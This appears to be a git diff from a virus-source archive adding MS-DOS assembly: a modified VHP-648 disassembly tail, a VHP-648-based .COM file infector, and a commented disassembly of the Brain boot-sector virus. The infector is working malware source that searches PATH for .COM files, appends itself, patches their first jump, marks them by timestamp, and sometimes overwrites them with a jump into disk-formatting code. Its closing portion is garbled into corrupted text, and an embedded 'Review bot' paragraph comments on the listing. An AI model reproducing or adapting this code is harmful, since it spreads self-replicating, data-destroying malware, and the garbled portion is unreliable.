ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,not 1 ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. 
+ + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) 
+ + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus3.asm b/MSDOS/Virus.MSDOS.Unknown.virus3.asm new file mode 100644 index 00000000..2b35cfa8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus3.asm 
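Review bot: The listing has been altered relative to the sample it names — `jmp short n_000266 ;CHANGED. Was jnz here` disables the branch that writes `bad_jmp` over the first instruction — yet the `title` still presents it as a plain "Disassembly listing of the VHP-648 virus", so a reader could mistake it for a pristine disassembly. The modification should be recorded in the header, together with the detection-relevant traits the body already documents: the infection marker is a file timestamp whose seconds field reads 62 (`cmp al,62d/2` on the find-next path and the `or cx,11111b` byte sequence at `oldtime`), and only files between 10 and 64000 bytes are touched (`cmp [si+79],64000d` / `cmp word ptr [si+79],10d`). A note such as `; Archive note: modified disassembly - destructive branch disabled in this listing; infected files are marked by timestamp seconds = 62; targets .COM files of 10..64000 bytes` would make the sample's state and indicators clear at a glance. The hand-encoded `db 081,0E1,...` sequences are already explained by their inline comments and need no further note.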
@@ -0,0 +1,309 @@
+ name Virus
+ title Virus; based on the famous VHP-648 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+environ equ 2C
+
+start:
+ jmp virus
+ int 20
+
+data label byte ;Data section
+dtaaddr dd ? ;Disk Transfer Address
+ftime dw ? ;File date
+fdate dw ? ;File time
+fattrib dw ? ;File attribute
+saveins db 3 dup (90) ;Original first 3 bytes
+newjmp db 0E9 ;Code of jmp instruction
+codeptr dw ? ;Here is formed a jump to virus code
+allcom db '*.COM',0 ;Filespec to search for
+poffs dw ? ;Address of 'PATH' string
+eqoffs dw ? ;Address of '=' sign
+pathstr db 'PATH='
+fname db 40 dup (' ') ;Path name to search for
+
+;Disk Transfer Address for Find First / Find Next:
+
+mydta label byte
+drive db ? ;Drive to search for
+pattern db 13d dup (?) ;Search pattern
+reserve db 7 dup (?) ;Not used
+attrib db ? ;File attribute
+time dw ? ;File time
+date dw ? ;File date
+fsize dd ? ;File size
+namez db 13d dup (?) ;File name found
+
+;This replaces the first instruction of a destroyed file.
+;It's a jmp instruction into the hard disk formatting program (IBM XT only):
+
+bad_jmp db 0EA,0,0,0,0C8
+errhnd dd ?
+
+virus:
+ push cx ;Save CX
+
+ mov dx,offset data ;Restore original first instruction
+modify equ $-2 ;The instruction above is changed
+ ; before each contamination
+ cld
+ mov si,dx
+ add si,saveins-data ;Instruction saved there
+ mov di,offset start
+ mov cx,3 ;Move 3 bytes
+ rep movsb ;Do it
+ mov si,dx ;Keep SI pointed at data
+
+ mov ah,30 ;Get DOS version
+ int 21
+ cmp al,0 ;Less than 2.0?
+ jne skip1
+ jmp exit ;Exit if so
+
+skip1:
+ push es ;Save ES
+ mov ah,2F ;Get current DTA in ES:BX
+ int 21
+ mov [si+dtaaddr-data],bx ;Save it in dtaaddr
+ mov [si+dtaaddr+2-data],es
+
+ mov ax,3524 ;Get interrupt 24h handler
+ int 21 ; and save it in errhnd
+ mov [si+errhnd-data],bx
+ mov [si+errhnd+2-data],es
+ pop es ;Restore ES
+
+ mov ax,2524 ;Set interrupt 24h handler
+ mov dx,si
+ add dx,handler-data
+ int 21
+
+ mov dx,mydta-data
+ add dx,si
+ mov ah,1A ;Set DTA
+ int 21
+
+ push es ;Save ES & SI
+ push si
+ mov es,ds:[environ] ;Environment address
+ xor di,di
+n_00015A: ;Search 'PATH' in environment
+ pop si ;Restore data offset in SI
+ push si
+ add si,pathstr-data
+ lodsb
+ mov cx,8000 ;Maximum 32K in environment
+ repne scasb ;Search for first letter ('P')
+ mov cx,4 ;4 letters in 'PATH'
+n_000169:
+ lodsb ;Search for next char
+ scasb
+ jne n_00015A ;If not found, search for next 'P'
+ loop n_000169 ;Loop until done
+ pop si ;Restore SI & ES
+ pop es
+
+ mov [si+poffs-data],di ;Save 'PATH' offset in poffs
+ mov bx,si ;Point BX at data area
+ add si,fname-data ;Point SI & DI at fname
+ mov di,si
+ jmp short n_0001BF
+
+n_000185:
+ cmp word ptr [si+poffs-data],6C
+ jne n_00018F
+ jmp olddta
+n_00018F:
+ push ds
+ push si
+ mov ds,es:[environ]
+ mov di,si
+ mov si,es:[di+poffs-data]
+ add di,fname-data
+n_0001A1:
+ lodsb
+ cmp al,';'
+ je n_0001B0
+ cmp al,0
+ je n_0001AD
+ stosb
+ jmp n_0001A1
+n_0001AD:
+ xor si,si
+n_0001B0:
+ pop bx
+ pop ds
+ mov [bx+poffs-data],si
+ cmp byte ptr [di-1],'\'
+ je n_0001BF
+ mov al,'\' ;Add '\' if not already present
+ stosb
+
+n_0001BF:
+ mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs
+ mov si,bx ;Restore data pointer in SI
+ add si,allcom-data
+ mov cl,6 ;6 bytes in ASCIIZ '*.COM'
+ rep movsb ;Move '*.COM' at fname
+ mov si,bx ;Restore SI
+
+ mov ah,4E ;Find first file
+ mov dx,fname-data
+ add dx,si
+ mov cl,11b ;Hidden, Read/Only or Normal files
+ int 21
+ jmp short n_0001E3
+
+findnext:
+ mov ah,4F ;Find
next file
+ int 21
+n_0001E3:
+ jnc n_0001E7 ;If found, try to contaminate it
+ jmp n_000185 ;Otherwise search in another directory
+
+n_0001E7:
+ mov ax,[si+time-data] ;Check file time
+ and al,11111b ; (the seconds, more exactly)
+ cmp al,62d/2 ;Are they 62?
+
+;If so, file is already contains the virus, search for another:
+
+ je findnext
+
+;Is file size greather than 64,000 bytes?
+
+ cmp [si+fsize-data],64000d
+ ja findnext ;If so, search for next file
+
+;Is file size less than 10 bytes?
+
+ cmp word ptr [si+fsize-data],10d
+ jb findnext ;If so, search for next file
+
+ mov di,[si+eqoffs-data]
+ push si ;Save SI
+ add si,namez-data ;Point SI at namez
+n_000209:
+ lodsb
+ stosb
+ cmp al,0
+ jne n_000209
+
+ pop si ;Restore SI
+ mov ax,4300 ;Get file attributes
+ mov dx,fname-data
+ add dx,si
+ int 21
+
+ mov [si+fattrib-data],cx ;Save them in fattrib
+ mov ax,4301 ;Set file attributes
+ and cl,not 1 ;Turn off Read Only flag
+ int 21
+
+ mov ax,3D02 ;Open file with Read/Write access
+ int 21
+ jnc n_00023E
+ jmp oldattr ;Exit on error
+
+n_00023E:
+ mov bx,ax ;Save file handle in BX
+ mov ax,5700 ;Get file date & time
+ int 21
+ mov [si+ftime-data],cx ;Save time in ftime
+ mov [si+fdate-data],dx ;Save date in fdate
+
+ mov ah,2C ;Get system time
+ int 21
+ and dh,111b ;Are seconds a multiple of 8?
+ jnz n_000266 ;If not, contaminate file (don't destroy):
+
+;Destroy file by rewriting an illegal jmp as first instruction:
+
+ mov ah,40 ;Write to file handle
+ mov cx,5 ;Write 5 bytes
+ mov dx,si
+ add dx,bad_jmp-data ;Write THESE bytes
+ int 21 ;Do it
+ jmp short oldtime ;Exit
+
+;Try to contaminate file:
+
+;Read first instruction of the file (first 3 bytes) and save it in saveins:
+
+n_000266:
+ mov ah,3F ;Read from file handle
+ mov cx,3 ;Read 3 bytes
+ mov dx,saveins-data ;Put them there
+ add dx,si
+ int 21
+ jc oldtime ;Exit on error
+ cmp ax,3 ;Are really 3 bytes read?
+ jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + xor cx,cx ;0 bytes from end + xor dx,dx + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer (file size) + add ax,virus-data-3 ;Add virus data length to get code offset + mov [si+codeptr-data],ax ;Save result in codeptr + inc ch ;Add 100h to CX + mov di,si + add di,modify-data ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + int 21 + jc oldtime ;Exit on error + cmp ax,endcode-data ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + xor cx,cx ;Just at the file beginning + xor dx,dx + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file ate-dne bove ata area + adttttttt +grrr + +frrrrrrt: + mov ah,4Frrrrrrrrrrre EPpll zDstrrrrrr +e ata area + adttttttt +grrr + g1r1rH)a0x,2524 a0me l eO3Efleqryc+qn_00dd si,d ont 21 + jc oldtime ;Exit on error + cmp me l eO3E*; +conds, more exa mov ahop ssi,d ont 21 G3,n'0exit ;Exit if i bl eO3Efleq n_0001A1: + lods01: + Tn v ax,vitrtvs,pathstrt + rp +tore SI +ff to enaMvall byly ont 21 + jc ?i eO3js + +mar it vall bylit vall tfll etan +rE ax,[di+poffs-datat +conds,lodsblit )Eo +:b; eO3Eeax ;Get the value of file pointer (f + +mar file + xor'artvs,papoinre to file hand ;n written? + jenaMoS wi,edO3E*;cog1ll byly ont 2ijc oltfll etan +rnax,4CSave 'n,X cs,papa tss a font ah,4E ,Nt5h +enaMoS wta 'p ax,c olhem in Kpto file hand ;n writc file +;o dleptrle han yc+qnlile + xor'artvsd ;nCcfont n v ae od + mo ldfile +le hh znt S wi, d +rt2 \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus32a.asm b/MSDOS/Virus.MSDOS.Unknown.virus32a.asm new file mode 100644 index 00000000..90f4eac6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus32a.asm 
@@ -0,0 +1,1275 @@
+The following is a disassembled and commented version of the Pakistani Brain
+virus - segment one. All comments, structure inclusions and explanatory
+information is copyright InterPath Corporation, 1987, 1988. This document may
+not be distributed or copied without the express written consent of InterPath
+Corporation. Contact InterPath at 408 988 3832.
+
+ PAGE 64,132
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+CODE SEGMENT PUBLIC 'CODE' ;
+ ASSUME CS:CODE,DS:CODE,ES:CODE,SS:NOTHING
+ ;
+ ORG 0 ;
+ ;
+BPB EQU 3+8 ;JMP + OEM_NAME
+ ;
+;-----------------------------------------------------------------------;
+; COPY OF BOOT SECTOR ;
+;-----------------------------------------------------------------------;
+ ;
+ DB 6 DUP (?) ;
+ ;
+L0006 DB ? ;HEAD
+L0007 DB ? ;SECTOR
+L0008 DB ? ;TRACK
+ ;
+L0009 DB ? ;HEAD
+L000A DB ? ;SECTOR
+L000B DB ? ;TRACK
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ ;
+ ORG 512 ;
+ ;
+;-----------------------------------------------------------------------;
+; (BOOT SECTOR TYPE FORMAT!)
;
+;-----------------------------------------------------------------------;
+CONTINUE: JMP CONTINUE_2 ;023C
+ ;
+L0203 DB 'IBM X3.2' ;OEM NAME AND VERSION
+ ;
+ DW 512 ;BYTES PER SECTOR
+ DB 2 ;SECTORS PER ALLOCATION UNIT
+ DW 1 ;RESERVED SECTORS
+L0210 DB 2 ;NUMBER OF FATS
+ DW 112 ;NUMBER OF ROOT DIR ENTRIES
+ DW 2D0H ;SECTORS PER DISK
+ DB 0FDH ;MEDIA ID
+ DW 2 ;SECTORS PER FAT
+ DW 9 ;SECTORS PER TRACK
+ DW 2 ;NUMBER OF HEADS
+ DW 0 ;HIDDEN SECTORS
+ ;
+;---------------------------------------;
+ DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+
+ DB 2
+DISK_PARM DB 0DFH,2,25H,2,12H,2AH,0FFH,50H,0F6H,0,2
+
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+REBOOT: INT 19H ;REBOOT
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+CONTINUE_2: ;
+ CLI ;
+ XOR AX,AX ;
+ MOV ES,AX ;ES=0
+ MOV SS,AX ;SS:SP = 0000:7C00
+ MOV SP,7C00H ;
+ MOV DS,AX ;
+ MOV BX,07C0H ;INITIALIZE DISK POINTER (INT 1E)
+ MOV Word Ptr [78H],2FH ;0000:0078 = (DWORD) 07C0:002F
+ MOV [7AH],BX ;
+ ;
+ MOV DS,BX ;DS = 07C0
+ MOV DX,[1EH] ;GET DRIVE/HEAD ;BOOT:001E !
+ MOV [20H],DL ;SAVE DRIVE ;BOOT:0020 !
+ INT 13H ;RESET
+ JNB C_10 ;
+ JMP ERROR_2 ;IF ERROR...'BOOT FAILURE'
+ ;
+C_10: MOV SI,BPB ;SI = BPB ;BOOT:000B
+ MOV CX,[SI] ;CX = BYTES PER SECTOR
+ SHR CH,1 ;WORDS PER SECTOR
+ XCHG CH,CL ;
+ MOV [2BH],CX ;SAVE ;BOOT:002B
+ MOV AL,[SI+5] ;AL= NUMBER OF FATS ;BOOT:0010
+ XOR AH,AH ;
+ MUL Word Ptr [SI+0BH] ;TOTAL FAT SECTORS ;BOOT:0016
+ ADD AX,[SI+3] ;+RESERVED SECTORS ;BOOT:000E
+ ADD AX,[SI+11H] ;+HIDDEN SECTORS ;BOOT:001C
+ MOV [24H],AX ;SAVE IT ;BOOT:0024
+ MOV BX,7E00H ;
+ CALL UI ;
+ ;
+ MOV BX,ES ;SAVE ES
+ MOV AX,70H ;ES=0070H
+ MOV ES,AX ;
+ MOV AX,32 ;32*
+ MUL Word Ptr [SI+6] ; ROOT DIR ENTRIES+
+ MOV CX,[SI] ;
+ ADD AX,CX ; BYTES/SECTOR
+ DEC AX ; -1
+ DIV CX ; /BYTES/SECTOR
+ ADD [24H],AX ;ADD TO BYTES IN BOOT & FAT
+ ;
+ MOV CL,[2AH] ;
+ MOV AX,[24H] ;
+ CALL READ_CLUSTER ;(READ BOOT SECTOR ???)
+ ;
+ PUSH ES ;
+ POP DS ;
+ JMP 0070H:0000H ;(PASS CONTROL TO ???)
+ ;
+;-----------------------------------------------------------------------;
+; HEAVY CRUNCHING HERE (CLUSTER READS ?!?!?!) ;
+; ON ENTRY: AX = ?
+; ES:BX = DTA ;
+; CL = ?
;
+; DS:SI = BPB ;
+; DS:[0021] = ;
+;-----------------------------------------------------------------------;
+READ_CLUSTER: ;02B3
+ PUSH BX ;
+ PUSH AX ;
+ ;
+ MOV AL,CL ;
+ MUL Byte Ptr [2BH] ;
+ MOV [29H],AL ;
+ POP AX ;
+ MUL Word Ptr [2BH] ;
+ DIV Word Ptr [SI+0DH] ;(BPB.SECTORS PER TRACK)
+ INC DL ;
+ MOV [28H],DL ;
+ PUSH DX ;
+ XOR DX,DX ;
+ DIV Word Ptr [SI+0FH] ;(BPB.NUMBER OF HEADS)
+ MOV [21H],DL ;
+ MOV [26H],AX ;
+ POP DX ;
+RC_10: MOV CL,[29H] ;
+ ADD DL,CL ;
+ MOV AX,[SI+0DH] ;(BPB.SECTORS PER TRACK)
+ INC AX ;
+ CMP DL,AL ;
+ JBE RC_20 ;
+ SUB AL,[28H] ;
+ MOV CL,AL ;
+RC_20: MOV AL,CL ;
+ MOV DX,[26H] ;
+ MOV CL,6 ;
+ SHL DH,CL ;
+ OR DH,[28H] ;
+ MOV CX,DX ;
+ XCHG CH,CL ;
+ MOV DX,[20H] ;
+ ;
+ MOV AH,2 ;READ SECTOR
+ PUSH AX ;
+ INT 13H ;
+ POP AX ;
+ JB ERROR_2 ;IF ERROR...'BOOT FAILURE'
+ SUB [29H],AL ;
+ JBE RC_90 ;
+ CBW ;
+ MUL Word Ptr [2DH] ;
+ ADD BX,AX ;
+ INC Byte Ptr [21H] ;
+ MOV DL,[21H] ;
+ CMP DL,[SI+0FH] ;
+ MOV DL,1 ;
+ MOV [28H],DL ;
+ JB RC_10 ;
+ MOV Byte Ptr [21H],0 ;
+ INC Word Ptr [26H] ;
+ JMP RC_10 ;
+ ;
+RC_90: POP BX ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; PRINT BOOT ERROR MESSAGE AND WAIT FOR A KEY ;
+;-----------------------------------------------------------------------;
+ERROR_1: ;0339
+ MOV SI,01B3H ;'Non-System disk'
+ JMP E_10 ;
+ ;
+;---------------------------------------;
+ERROR_2: ;
+ MOV SI,01C5H ;'BOOT failure'
+E_10: CALL DISPLAY_STRING ;
+ ;
+ MOV SI,01D4H ;'Replace and press any key when ready'
+ CALL DISPLAY_STRING ;
+ ;
+ MOV AH,0 ;WAIT FOR A KEY
+ INT 16H ;
+E_20: MOV AH,1 ; THROW IT AWAY AND
+ INT 16H ; WAIT FOR ANOTHER ONE BUT
+ JNZ E_20 ; DONT GET IT
+ JMP REBOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; DISPLAY ASCIIZ STRING ;
+; ON ENTRY: DS:SI = ASCIIZ STRING ;
+;-----------------------------------------------------------------------;
+DISPLAY_STRING: ;0357
+DS_00: LODSB ;DISPLAY UNTIL NULL
+ OR
AL,AL ;
+ JZ DS_90 ;
+ MOV AH,0EH ;
+ MOV BX,7 ;
+ INT 10 ;
+ JMP DS_00 ;
+DS_90: RET ;0365
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+UI: ;0366:
+ MOV CL,01 ;
+ CALL READ_CLUSTER ;
+ ;
+ PUSH SI ;
+ MOV DI,BX ;
+ MOV AX,ES:[BX+1C] ;
+ XOR DX,DX ;
+ DIV Word Ptr [SI] ;
+ INC AL ;
+ MOV [002A],AL ;
+ MOV SI,019D ;
+ MOV CX,000B ;
+ REPZ ;
+ CMPSB ;
+ JNZ ERROR_1 ;'NON SYSTEM DISK'
+ MOV AX,ES:[BX+3A] ;
+ MOV [0022],AX ;
+ MOV DI,BX ;
+ ADD DI,+20 ;
+ MOV SI,01A8 ;
+ MOV CX,000B ;
+ REPZ ;
+ CMPSB ;
+ JNZ ERROR_1 ;'NON SYSTEM DISK'
+ POP SI ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L039D DB 'IBMBIO COM'
+ DB 'IBMDOS COM'
+ DB CR,LF,'Non-System disk',0
+ DB CR,LF,'BOOT failure',0
+ DB CR,LF,'Replace and press any key when ready',0
+ DB 90H,90H,90H,55H,0AAH
+
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0400: JMP SHORT CONT_A ;
+ ;
+ DB '(c) 1986 Basit & Amjads (pvt) Ltd ',0
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+CONT_A: ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0A5B DB 'IBMBIO COM'
+ DB 'IBMDOS COM'
+ DB CR,LF,'Non-System disk',0
+ DB CR,LF,'BOOT failure',0
+ DB CR,LF,'Replace and press any key when ready',0
+ DB 90H,90H,90H,55H,0AAH
+
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ ADD AL,00 ;0425 0400
+ ADD [06C6],CH ;0427 002EC606
+ AND AX,1F02 ;042B 25021F
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+REDIRECT_13: ;042E
+ XOR AX,AX ;GET INT 13 VECTOR
+ MOV DS,AX ;
+ MOV AX,[004CH] ;
+ MOV [01B4H],AX ; (SAVE IT TO INT 6D VECTOR)
+ MOV AX,[004EH] ;
+ MOV [01B6H],AX ;
+ MOV AX,0276H ;SET INT 13 VECTOR
+ MOV [004CH],AX ;
+ MOV AX,CS ;
+ MOV [004EH],AX ;
+ ;
+ MOV CX,0004 ;RETRY = 4
+ XOR AX,AX ;
+ MOV ES,AX ;
+L0450: PUSH CX ;
+ MOV DH,CS:[0006] ;DH = HEAD
+ MOV DL,00 ;DRIVE A:
+ MOV CX,CS:[0007] ;CX = TRACK/SECTOR
+ MOV AX,0201 ;READ 1 SECTOR
+ MOV BX,7C00 ;ES:BX == DTA = 0000:7C00
+ INT 6DH ;
+ JNB L0470 ;
+ MOV AH,00 ;RESET
+ INT 6DH ;
+ POP CX ;TRY AGAIN
+ LOOP L0450 ;
+ INT 18H ;LOAD BASIC
+ ;
+L0470: JMP 0000:7C00 ;JUMP TO BOOT LOADER ?!?!
+ ;
+ NOP ;0475 90
+ STI ;0476 FB
+ CMP AH,02 ;0477 80FC02
+ JNZ L0494 ;047A 7518
+ CMP DL,02 ;047C 80FA02
+ JA L0494 ;047F 7713
+ CMP CH,00 ;0481 80FD00
+ JNZ L048B ;0484 7505
+ CMP DH,00 ;0486 80FE00
+ JZ L0497 ;0489 740C
+L048B: DEC Byte Ptr CS:[0225] ;048B 2EFE0E2502
+ JNZ L0494 ;0490 7502
+ JMP L0497 ;0492 EB03
+L0494: JMP L053C ;0494 E9A500
+L0497: MOV Byte Ptr CS:[0227],00 ;0497 2EC606270200
+ MOV Byte Ptr CS:[0225],04 ;049D 2EC606250204
+ PUSH AX ;04A3 50
+ PUSH BX ;04A4 53
+ PUSH CX ;04A5 51
+ PUSH DX ;04A6 52
+ MOV CS:[0226],DL ;04A7 2E88162602
+ MOV CX,0004 ;04AC B90400
+ PUSH CX ;04AF 51
+ MOV AH,00 ;04B0 B400
+ INT 6D ;04B2 CD6D
+ JB ;04CB ;04B4 7215
+ MOV DH,00 ;04B6 B600
+ MOV CX,0001 ;04B8 B90100
+ MOV BX,06BE ;04BB BBBE06
+ PUSH ES ;04BE 06
+ MOV AX,CS ;04BF 8CC8
+ MOV ES,AX ;04C1 8EC0
+ MOV AX,0201 ;04C3 B80102
+ INT 6D ;04C6 CD6D
+ POP ES ;04C8 07
+ JNB ;04D1 ;04C9 7306
+ POP CX ;04CB 59
+ LOOP ;04AF ;04CC E2E1
+ JMP ;04FF ;04CE EB2F
+ NOP ;04D0 90
+ POP CX ;04D1 59
+ MOV AX,CS:[06C2] ;04D2 2EA1C206
+ CMP AX,1234 ;04D6 3D3412
+ JNZ ;04E3 ;04D9 7508
+ MOV Byte Ptr CS:[0227],01 ;04DB 2EC606270201
+ JMP ;0503 ;04E1 EB20
+ PUSH DS ;04E3 1E
+ PUSH ES ;04E4
06
+ MOV AX,CS ;04E5 8CC8
+ MOV DS,AX ;04E7 8ED8
+ MOV ES,AX ;04E9 8EC0
+ PUSH SI ;04EB 56
+ CALL L0804 ;04EC E81503
+ JB ;04FA ;04EF 7209
+ MOV Byte Ptr CS:[0227],02 ;04F1 2EC606270202
+ CALL L06B2 ;04F7 E8B801
+ POP SI ;04FA 5E
+ POP ES ;04FB 07
+ POP DS ;04FC 1F
+ JNB ;0503 ;04FD 7304
+ MOV AH,00 ;04FF B400
+ INT 6D ;0501 CD6D
+ POP DX ;0503 5A
+ POP CX ;0504 59
+ POP BX ;0505 5B
+ POP AX ;0506 58
+ CMP CX,+01 ;0507 83F901
+ JNZ L053C ;050A 7530
+ CMP DH,00 ;050C 80FE00
+ JNZ L053C ;050F 752B
+ CMP Byte Ptr CS:[0227],01 ;0511 2E803E270201
+ JNZ ;052A ;0517 7511
+ MOV CX,CS:[06C5] ;0519 2E8B0EC506
+ MOV DX,CS:[06C3] ;051E 2E8B16C306
+ MOV DL,CS:[0226] ;0523 2E8A162602
+ JMP L053C ;0528 EB12
+ CMP Byte Ptr CS:[0227],02 ;052A 2E803E270202
+ JNZ L053C ;0530 750A
+ ;
+ MOV CX,CS:[0007] ;CX = TRACK/SECTOR
+ MOV DH,CS:[0006] ;DH = HEAD
+L053C: INT 6DH ;
+ RETF 2 ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0541 DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0550: JMP CONTINUE_3 ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0553 DW 3 ;
+ DB ' (c) 1986 Basit & Amjads (pvt) Ltd'
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+CONTINUE_3: ;0577
+ CALL READ_VERIFY ;READ VERIFY
+ MOV AX,[06BEH] ;IF ??? == DOUBLD SIDED 9 SECTORS...
+ CMP AX,0FFFDH ;
+ JE L0586 ;...CONTINUE
+ MOV AL,3 ;ELSE RETURN ???
ERROR
+ STC ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+L0586: ;0586
+ MOV CX,0037 ;
+ MOV Word Ptr [0353],0000 ;
+ CALL ;05F8 ;058F E86600
+ CMP AX,0000 ;0592 3D0000
+ JNZ ;05A5 ;0595 750E
+ INC Word Ptr [0353] ;0597 FF065303
+ CMP Word Ptr [0353],+03 ;059B 833E530303
+ JNZ ;05AB ;05A0 7509
+ JMP ;05B6 ;05A2 EB12
+ NOP ;05A4 90
+ MOV Word Ptr [0353],0000 ;05A5 C70653030000
+ INC CX ;05AB 41
+ CMP CX,0163 ;05AC 81F96301
+ JNZ ;058F ;05B0 75DD
+ MOV AL,01 ;05B2 B001
+ STC ;05B4 F9
+ RET ;05B5 C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ MOV DL,03 ;05B6 B203
+ CALL ;05CB ;05B8 E81000
+ DEC CX ;05BB 49
+ DEC DL ;05BC FECA
+ JNZ ;05B8 ;05BE 75F8
+ INC CX ;05C0 41
+ CALL CONVERT_1 ;CLUSTER TO TRACK/SECTOR/HEAD
+ CALL ;062D ;05C4 E86600
+ MOV AL,00 ;05C7 B000
+ CLC ;05C9 F8
+ RET ;05CA C3
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+ PUSH CX ;05CB 51
+ PUSH DX ;05CC 52
+ MOV SI,06BE ;05CD BEBE06
+ MOV AL,CL ;05D0 8AC1
+ SHR AL,1 ;05D2 D0E8
+ JB ;05E4 ;05D4 720E
+ CALL FUNCTION_1 ;BX = (CX*3)/2
+ MOV AX,[BX+SI] ;05D9 8B00
+ AND AX,F000 ;05DB 2500F0
+ OR AX,0FF7 ;05DE 0DF70F
+ JMP ;05EF ;05E1 EB0C
